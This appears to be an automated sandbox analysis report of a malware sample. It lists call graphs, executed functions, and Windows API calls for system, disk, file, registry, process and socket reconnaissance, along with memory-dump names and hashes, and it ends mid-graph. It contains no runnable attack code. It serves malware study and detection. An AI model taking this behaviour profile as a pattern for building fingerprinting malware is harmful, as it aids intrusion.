f92f2c 65833->65841 65834 f931d3 65835 f92fb3 RegOpenKeyExA 65835->65841 65836 f9315c RegEnumKeyExA 65837 f931b2 RegCloseKey 65836->65837 65836->65841 65837->65841 65838 f93046 RegOpenKeyExA 65839 f93089 RegQueryValueExA 65838->65839 65838->65841 65840 f9313b RegCloseKey 65839->65840 65839->65841 65840->65841 65841->65834 65841->65835 65841->65836 65841->65838 65841->65840 65842 f913c9 65846 f91160 65842->65846 65845 f913a1 65846->65845 65847 13193e0 65846->65847 65857 1318a20 _open fgetc isxdigit 65846->65857 65853 1319400 65847->65853 65856 13193f3 65847->65856 65848 1319688 65849 13196c7 65848->65849 65848->65856 65858 1319280 vfprintf 65848->65858 65859 1319220 vfprintf 65849->65859 65852 13196df 65852->65846 65853->65848 65853->65849 65854 1319280 vfprintf 65853->65854 65855 1319220 vfprintf 65853->65855 65853->65856 65854->65853 65855->65853 65856->65846 65857->65846 65858->65848 65859->65852 65325 141f250 65326 141f282 65325->65326 65327 141f28e 65326->65327 65330 1318f70 65326->65330 65329 141f297 65337 1318e90 _open 65330->65337 65332 1318f82 65333 1318e90 _open 65332->65333 65334 1318fa2 65333->65334 65335 1318f70 _open 65334->65335 65336 1318fb8 65335->65336 65336->65329 65338 1318eba 65337->65338 65338->65332 65860 1417830 65861 141785a 65860->65861 65862 1417866 65861->65862 65863 1318f70 _open 65861->65863 65864 141786f 65863->65864 65870 13212c0 65864->65870 65867 14178a6 65868 1318f70 _open 65869 14178af 65868->65869 65871 13212cc 65870->65871 65874 131e050 65871->65874 65873 13212fa 65873->65867 65873->65868 65885 131e09d 65874->65885 65898 131e503 65874->65898 65876 131feb6 isxdigit 65876->65898 65877 131e243 65882 131e18e 65877->65882 65899 131df60 fgetc 65877->65899 65878 131df60 fgetc 65878->65898 65879 131eb52 65880 131eb63 65879->65880 65881 131e81a 65879->65881 65883 131f0d5 65880->65883 65897 131eb7a 65880->65897 65890 131e850 65881->65890 65881->65897 65882->65873 65904 131df60 fgetc 65883->65904 65884 131df60 fgetc 65884->65885 65885->65877 65885->65882 65885->65884 65892 131e388 65885->65892 65885->65898 65889 131e6b9 65896 131e6e4 65889->65896 65889->65897 65889->65898 65890->65882 65901 131df60 fgetc 65890->65901 65892->65879 65892->65882 65892->65889 65892->65898 65903 131df60 fgetc 65892->65903 65894 131f0e8 65894->65882 65894->65898 65905 131df60 fgetc 65894->65905 65896->65882 65900 131df60 fgetc 65896->65900 65897->65882 65897->65898 65902 131df60 fgetc 65897->65902 65898->65876 65898->65878 65898->65882 65899->65877 65900->65898 65901->65898 65902->65898 65903->65892 65904->65894 65905->65894 65906 131b180 Sleep 65339 fad5e0 65340 fad652 WSAStartup 65339->65340 65341 fad5f0 65339->65341 65340->65341 65342 fad664 65340->65342 65344 fad67c 65341->65344 65346 fad690 _open 65341->65346 65345 fad5fa 65346->65345 65347 6e4047f Process32FirstW 65348 6e404b0 65347->65348 65907 fcb3c0 65908 fcb3ee 65907->65908 65909 fcb3cb 65907->65909 65911 f976a0 2 API calls 65909->65911 65913 fc9290 65909->65913 65910 fcb3ea 65911->65910 65914 f976a0 2 API calls 65913->65914 65915 fc92e5 65914->65915 65916 fc93c3 65915->65916 65918 fc92f3 65915->65918 65921 fc9392 65916->65921 65927 fad090 _open 65916->65927 65917 fc93be 65917->65910 65918->65921 65922 fc9335 WSAIoctl 65918->65922 65920 fc93f7 65928 fd4f40 _open 65920->65928 65921->65917 65929 fd50a0 _open 65921->65929 65922->65921 65925 fc9366 65922->65925 65925->65921 65926 fc9371 setsockopt 65925->65926 65926->65921 65927->65920 65928->65921 65929->65917 65930 fce400 65931 fce412 65930->65931 65936 fce459 65930->65936 65932 fce422 65931->65932 65954 fe3030 _open 65931->65954 65955 ff09d0 _open 65932->65955 65935 fce4a8 65936->65935 65939 fce495 65936->65939 65942 fcb5a0 65936->65942 65937 fce42b 65956 fc68b0 6 API calls 65937->65956 65939->65935 65941 fcb5a0 _open 65939->65941 65941->65935 65943 fcb5d2 65942->65943 65944 fcb5c0 65942->65944 65943->65939 65944->65943 65945 fcb713 65944->65945 65950 fcb626 65944->65950 65958 fd4f40 _open 65945->65958 65947 fcb65a 65947->65943 65948 fcb72b 65947->65948 65949 fcb737 65947->65949 65948->65943 65959 fd50a0 _open 65948->65959 65949->65943 65960 fd50a0 _open 65949->65960 65950->65943 65950->65947 65950->65948 65950->65949 65957 fd50a0 _open 65950->65957 65954->65932 65955->65937 65956->65936 65957->65950 65958->65943 65959->65943 65960->65943 65961 fcb400 65962 fcb40b 65961->65962 65963 fcb425 65961->65963 65966 f97770 65962->65966 65964 fcb421 65967 f97790 65966->65967 65968 f977b6 recv 65966->65968 65967->65968 65969 f97799 65967->65969 65974 f977a3 65968->65974 65976 f977d4 65968->65976 65971 f977db 65969->65971 65969->65974 65978 f972a0 _open 65971->65978 65973 f977ec 65979 f9cb20 _open 65973->65979 65977 f972a0 _open 65974->65977 65976->65964 65977->65976 65978->65973 65979->65976 65980 fd0700 65988 fd0719 65980->65988 65995 fd099d 65980->65995 65983 fd09b5 65983->65995 66005 fd50a0 _open 65983->66005 65985 fd09f6 66006 f975a0 65985->66006 65986 fd0a35 66010 fd4f40 _open 65986->66010 65988->65983 65988->65985 65988->65986 65988->65995 65998 f97310 _open 65988->65998 65999 fcb8e0 _open 65988->65999 66000 fff570 _open 65988->66000 66001 fbeb30 _open 65988->66001 66002 ff13a0 _open 65988->66002 66003 10139a0 _open 65988->66003 66004 fbeae0 _open 65988->66004 65996 f975a0 _open 65996->65995 65998->65988 65999->65988 66000->65988 66001->65988 66002->65988 66003->65988 66004->65988 66005->65995 66007 f975aa 66006->66007 66009 f975d1 66006->66009 66007->66009 66011 f972a0 _open 66007->66011 66009->65996 66010->65995 66011->66009 66012 fcf6c3 66015 fcf6e3 66012->66015 66019 fcf7b9 66012->66019 66013 fcf72e 66014 fcf7f4 66013->66014 66022 fcf743 66013->66022 66016 fcf800 66014->66016 66032 fd0c80 _open 66014->66032 66015->66013 66028 fd50a0 _open 66015->66028 66019->66015 66019->66016 66031 fd4fd0 _open 66019->66031 66020 fcff5b 66027 fd0034 66020->66027 66033 fd50a0 _open 66020->66033 66022->66016 66025 fd50a0 _open 66022->66025 66029 f9fa50 _open 66022->66029 66030 fd0d30 _open 66022->66030 66025->66022 66028->66013 66029->66022 66030->66022 66031->66015 66032->66020 66033->66027

                                                            Executed Functions

                                                            Function 00F9255D Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 282fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 831 f9255d-f92614 call 1319f70 GetSystemInfo call 1419af0 call 1419ce0 GlobalMemoryStatusEx call 1419af0 call 1419ce0 913 f92619 call 6e002e2 831->913 914 f92619 call 6e00322 831->914 915 f92619 call 6e000a2 831->915 916 f92619 call 6e000e3 831->916 917 f92619 call 6e002a7 831->917 918 f92619 call 6e001e8 831->918 919 f92619 call 6e001aa 831->919 920 f92619 call 6e0006e 831->920 921 f92619 call 6e00334 831->921 922 f92619 call 6e000f4 831->922 923 f92619 call 6e00076 831->923 924 f92619 call 6e00037 831->924 925 f92619 call 6e0027a 831->925 926 f92619 call 6e001fd 831->926 927 f92619 call 6e001be 831->927 928 f92619 call 6e0017f 831->928 929 f92619 call 6e00000 831->929 930 f92619 call 6e00244 831->930 931 f92619 call 6e00347 831->931 932 f92619 call 6e00008 831->932 933 f92619 call 6e0004b 831->933 934 f92619 call 6e0020c 831->934 935 f92619 call 6e00150 831->935 936 f92619 call 6e00191 831->936 937 f92619 call 6e00314 831->937 938 f92619 call 6e00296 831->938 939 f92619 call 6e000d6 831->939 940 f92619 call 6e0015a 831->940 941 f92619 call 6e0025d 831->941 842 f9261b-f92620 843 f9277c-f92904 call 1419af0 call 1419ce0 KiUserCallbackDispatcher call 1419af0 call 1419ce0 call 1419af0 call 1419ce0 call 1318e38 call 1318be0 call 1318bd0 FindFirstFileW 842->843 844 f92626-f92637 call 14198f0 842->844 891 f92928-f9292c 843->891 892 f92906-f92926 FindNextFileW 843->892 849 f92754-f9275c 844->849 851 f9263c-f9264f GetDriveTypeA 849->851 852 f92762-f92777 call 1419ce0 849->852 854 f92743-f92751 call 1318b98 851->854 855 f92655-f92685 GetDiskFreeSpaceExA 851->855 852->843 854->849 855->854 858 f9268b-f9273e call 1419bc0 call 1419c50 call 1419ce0 call 14199e0 call 1419ce0 call 14199e0 call 1419ce0 call 1418050 855->858 858->854 893 f9292e 891->893 894 f92932-f9296f call 1419af0 call 1419ce0 call 1318e78 891->894 892->891 892->892 893->894 900 f92974-f92979 894->900 901 f929a9-f929fe call 131a2b0 call 1419af0 call 1419ce0 900->901 902 f9297b-f929a4 call 1419af0 call 1419ce0 900->902 902->901 913->842 914->842 915->842 916->842 917->842 918->842 919->842 920->842 921->842 922->842 923->842 924->842 925->842 926->842 927->842 928->842 929->842 930->842 931->842 932->842 933->842 934->842 935->842 936->842 937->842 938->842 939->842 940->842 941->842
                                                            APIs
                                                            • GetSystemInfo.KERNELBASE ref: 00F92579
                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 00F925CC
                                                            • GetDriveTypeA.KERNELBASE ref: 00F92647
                                                            • GetDiskFreeSpaceExA.KERNELBASE ref: 00F9267E
                                                            • KiUserCallbackDispatcher.NTDLL ref: 00F927E2
                                                            • FindFirstFileW.KERNELBASE ref: 00F928F8
                                                            • FindNextFileW.KERNELBASE ref: 00F9291F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                            • String ID: @$`
                                                            • API String ID: 3271271169-3318628307
                                                            • Opcode ID: fbe080cfcf0f636aeea54cc493103a0cb535213c8387e154f9bc26ba896acdc9
                                                            • Instruction ID: 8ac0cd48be03c4e2e1706f41a2df3a9fcb48a9c9ac15b9227496fe77f09ee97e
                                                            • Opcode Fuzzy Hash: fbe080cfcf0f636aeea54cc493103a0cb535213c8387e154f9bc26ba896acdc9
                                                            • Instruction Fuzzy Hash: E6D1CAB490430A9FCB50EF69C99469EBBF0BF54354F00896EE898D7354E7349A84CF52
                                                            Function 00F929FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 942 f929ff-f92a2f FindFirstFileA 943 f92a38 942->943 944 f92a31-f92a36 942->944 945 f92a3d-f92a91 call 1419c50 call 1419ce0 RegOpenKeyExA 943->945 944->945 950 f92a9a 945->950 951 f92a93-f92a98 945->951 952 f92a9f-f92b0c call 1419c50 call 1419ce0 CharUpperA call 1318da0 950->952 951->952 960 f92b0e-f92b13 952->960 961 f92b15 952->961 962 f92b1a-f92b92 call 1419c50 call 1419ce0 call 1318e80 call 1318e70 960->962 961->962 971 f92bcc-f92c66 QueryFullProcessImageNameA CloseHandle call 1318da0 962->971 972 f92b94-f92ba3 962->972 982 f92c68-f92c6d 971->982 983 f92c6f 971->983 975 f92bb0-f92bca call 1318e68 972->975 976 f92ba5-f92bae 972->976 975->971 975->972 976->971 984 f92c74-f92ce9 call 1419c50 call 1419ce0 call 1318e80 call 1318e70 982->984 983->984 993 f92dcf-f92e1c call 1419c50 call 1419ce0 CloseHandle 984->993 994 f92cef-f92d49 call 1318bb0 call 1318da0 984->994 1035 f92e21 call 6e80ad9 993->1035 1036 f92e21 call 6e80c2b 993->1036 1037 f92e21 call 6e80beb 993->1037 1038 f92e21 call 6e80b4b 993->1038 1039 f92e21 call 6e80b5e 993->1039 1040 f92e21 call 6e80b0f 993->1040 1041 f92e21 call 6e80b81 993->1041 1042 f92e21 call 6e80b21 993->1042 1043 f92e21 call 6e80c13 993->1043 1044 f92e21 call 6e80bd3 993->1044 1045 f92e21 call 6e80ba3 993->1045 1005 f92d99-f92dad 994->1005 1006 f92d4b-f92d63 call 1318da0 994->1006 1004 f92e23-f92e2e 1007 f92e30-f92e35 1004->1007 1008 f92e37 1004->1008 1005->993 1006->1005 1015 f92d65-f92d7d call 1318da0 1006->1015 1010 f92e3c-f92ed6 call 1419c50 call 1419ce0 1007->1010 1008->1010 1023 f92ed8-f92ee1 1010->1023 1024 f92eea 1010->1024 1015->1005 1020 f92d7f-f92d97 call 1318da0 1015->1020 1020->1005 1026 f92daf-f92dc9 call 1318e68 1020->1026 1023->1024 1027 f92ee3-f92ee8 1023->1027 1028 f92eef-f92f16 call 1419c50 call 1419ce0 1024->1028 1026->993 1026->994 1027->1028 1035->1004 1036->1004 1037->1004 1038->1004 1039->1004 1040->1004 1041->1004 1042->1004 1043->1004 1044->1004 1045->1004
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                            • String ID: 0
                                                            • API String ID: 2406880114-4108050209
                                                            • Opcode ID: e2714b9dcbb688f0ea5ab3b49b2e210164000872d0ae80cb7044a67f00074983
                                                            • Instruction ID: f671e5c7a46af4c85a31e8239c2724984d85e2328bf3966d045ed288ab039e85
                                                            • Opcode Fuzzy Hash: e2714b9dcbb688f0ea5ab3b49b2e210164000872d0ae80cb7044a67f00074983
                                                            • Instruction Fuzzy Hash: 1EE1E7B490530A9FDB50EFA8D98469EBBF4BF54314F40886AE888DB354E734D984DF42
                                                            Function 00FA05B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1226 fa05b0-fa05b7 1227 fa07ee 1226->1227 1228 fa05bd-fa05d4 1226->1228 1229 fa05da-fa05e6 1228->1229 1230 fa07e7-fa07ed 1228->1230 1229->1230 1231 fa05ec-fa05f0 1229->1231 1230->1227 1232 fa05f6-fa0620 call fa7350 call f970b0 1231->1232 1233 fa07c7-fa07cc 1231->1233 1238 fa066a-fa068c call fcdec0 1232->1238 1239 fa0622-fa0624 1232->1239 1233->1230 1244 fa0692-fa06a0 1238->1244 1245 fa07d6-fa07e3 call fa7380 1238->1245 1241 fa0630-fa0655 call f970d0 call fa03c0 call fa7450 1239->1241 1265 fa065b-fa0668 call f970e0 1241->1265 1266 fa07ce 1241->1266 1249 fa06a2-fa06a4 1244->1249 1250 fa06f4-fa06f6 1244->1250 1245->1230 1255 fa06b0-fa06e4 call fa73b0 1249->1255 1252 fa07ef-fa082b call fa3000 1250->1252 1253 fa06fc-fa06fe 1250->1253 1269 fa0a2f-fa0a35 1252->1269 1270 fa0831-fa0837 1252->1270 1257 fa072c-fa0754 1253->1257 1255->1245 1271 fa06ea-fa06ee 1255->1271 1261 fa075f-fa078b 1257->1261 1262 fa0756-fa075b 1257->1262 1283 fa0700-fa0703 1261->1283 1284 fa0791-fa0796 1261->1284 1267 fa075d 1262->1267 1268 fa0707-fa0719 WSAEventSelect 1262->1268 1265->1238 1265->1241 1266->1245 1277 fa0723-fa0726 1267->1277 1268->1245 1276 fa071f 1268->1276 1273 fa0a3c-fa0a52 1269->1273 1274 fa0a37-fa0a3a 1269->1274 1279 fa0839-fa084c call fa6fa0 1270->1279 1280 fa0861-fa087e 1270->1280 1271->1255 1272 fa06f0 1271->1272 1272->1250 1273->1245 1281 fa0a58-fa0a81 call fa2f10 1273->1281 1274->1273 1276->1277 1277->1252 1277->1257 1293 fa0a9c-fa0aa4 1279->1293 1294 fa0852 1279->1294 1290 fa0882-fa088d 1280->1290 1281->1245 1299 fa0a87-fa0a97 call fa6df0 1281->1299 1283->1268 1284->1283 1288 fa079c-fa07c2 call f976a0 1284->1288 1288->1283 1297 fa0893-fa08b1 1290->1297 1298 fa0970-fa0975 1290->1298 1293->1245 1294->1280 1296 fa0854-fa085f 1294->1296 1296->1290 1302 fa08c8-fa08f7 1297->1302 1300 fa097b-fa0989 call f970b0 1298->1300 1301 fa0a19-fa0a2c 1298->1301 1299->1245 1300->1301 1309 fa098f-fa099e 1300->1309 1301->1269 1310 fa08f9-fa08fb 1302->1310 1311 fa08fd-fa0925 1302->1311 1312 fa09b0-fa09c1 call f970d0 1309->1312 1313 fa0928-fa093f 1310->1313 1311->1313 1317 fa09c3-fa09c7 1312->1317 1318 fa09a0-fa09ae call f970e0 1312->1318 1319 fa08b3-fa08c2 1313->1319 1320 fa0945-fa096b 1313->1320 1322 fa09e8-fa0a03 WSAEnumNetworkEvents 1317->1322 1318->1301 1318->1312 1319->1298 1319->1302 1320->1319 1324 fa09d0-fa09e6 WSAEventSelect 1322->1324 1325 fa0a05-fa0a17 1322->1325 1324->1318 1324->1322 1325->1324
                                                            APIs
                                                            • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00FA0712
                                                            • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00FA09DD
                                                            • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00FA09FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: EventSelect$EnumEventsNetwork
                                                            • String ID: multi.c
                                                            • API String ID: 2170980988-214371023
                                                            • Opcode ID: f03f81d4a6c830015490ac424924372e0f507f666cb8cbb2f771aee8599bd844
                                                            • Instruction ID: 97eaebc5a11bc38c2b3295f77d7d95f217f213faea106e6b6263a16b941b7f4b
                                                            • Opcode Fuzzy Hash: f03f81d4a6c830015490ac424924372e0f507f666cb8cbb2f771aee8599bd844
                                                            • Instruction Fuzzy Hash: 01D1D3B1A083019FEB10DF24DC81B6B77E5FF96358F04482CF88596251EB78E958EB52
                                                            Function 00F97770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1326 f97770-f9778e 1327 f97790-f97797 1326->1327 1328 f977b6-f977c2 recv 1326->1328 1327->1328 1331 f97799-f977a1 1327->1331 1329 f9782e-f97832 1328->1329 1330 f977c4-f977d9 call f972a0 1328->1330 1330->1329 1333 f977db-f97829 call f972a0 call f9cb20 call 1318c50 1331->1333 1334 f977a3-f977b4 1331->1334 1333->1329 1334->1330
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: recv
                                                            • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                            • API String ID: 1507349165-640788491
                                                            • Opcode ID: 8d380527f30282beb3d42e0b4394fca53580ec114e0d7642664792a239c06fa3
                                                            • Instruction ID: 985f567e69f4f9afa161dc5f3bd08a58936ec4dc1ae1901ddb0a7563714d38f2
                                                            • Opcode Fuzzy Hash: 8d380527f30282beb3d42e0b4394fca53580ec114e0d7642664792a239c06fa3
                                                            • Instruction Fuzzy Hash: E11127B5A283447BFA30BA559C4AE273B5CEBC2B78F44061DF80866382E1209C04C6F2
                                                            Function 00FA6FA0 Relevance: 6.3, APIs: 4, Instructions: 261COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1467 fa6fa0-fa6fd2 1468 fa6feb-fa6ff1 1467->1468 1469 fa6fd4-fa6fd6 1467->1469 1470 fa6ff7-fa6ff9 1468->1470 1471 fa7324-fa7330 1468->1471 1472 fa6fe0-fa6fe4 1469->1472 1473 fa6fff-fa7016 1470->1473 1474 fa7186-fa7196 1470->1474 1475 fa701b-fa7041 1472->1475 1476 fa6fe6-fa6fe9 1472->1476 1473->1471 1474->1471 1477 fa7060-fa7074 1475->1477 1476->1468 1476->1472 1480 fa7076-fa7081 1477->1480 1481 fa7057-fa705a 1477->1481 1480->1481 1483 fa7083-fa7089 1480->1483 1481->1477 1482 fa7172-fa7174 1481->1482 1484 fa719b-fa71a8 1482->1484 1485 fa7176-fa7184 1482->1485 1486 fa708b-fa708f 1483->1486 1487 fa70dc-fa70df 1483->1487 1490 fa71f1-fa722d call fad7f0 select 1484->1490 1491 fa71aa-fa71be 1484->1491 1485->1490 1492 fa70b0-fa70bd 1486->1492 1493 fa7091 1486->1493 1488 fa712c-fa7132 1487->1488 1489 fa70e1-fa70e5 1487->1489 1488->1481 1501 fa7138-fa713c 1488->1501 1497 fa7100-fa710d 1489->1497 1498 fa70e7 1489->1498 1513 fa730b 1490->1513 1514 fa7233-fa723e 1490->1514 1499 fa730d-fa7310 1491->1499 1500 fa71c4-fa71c6 1491->1500 1495 fa70bf-fa70ce 1492->1495 1496 fa70d5 1492->1496 1502 fa70a0-fa70a7 1493->1502 1495->1496 1496->1487 1506 fa710f-fa711e 1497->1506 1507 fa7125 1497->1507 1505 fa70f0-fa70f7 1498->1505 1499->1471 1504 fa7312-fa7322 1499->1504 1508 fa71cc-fa71e6 1500->1508 1509 fa7331-fa7344 1500->1509 1510 fa713e 1501->1510 1511 fa714d-fa715a 1501->1511 1502->1492 1512 fa70a9-fa70ac 1502->1512 1504->1471 1505->1497 1517 fa70f9-fa70fc 1505->1517 1506->1507 1507->1488 1508->1471 1530 fa71ec 1508->1530 1509->1471 1529 fa7346 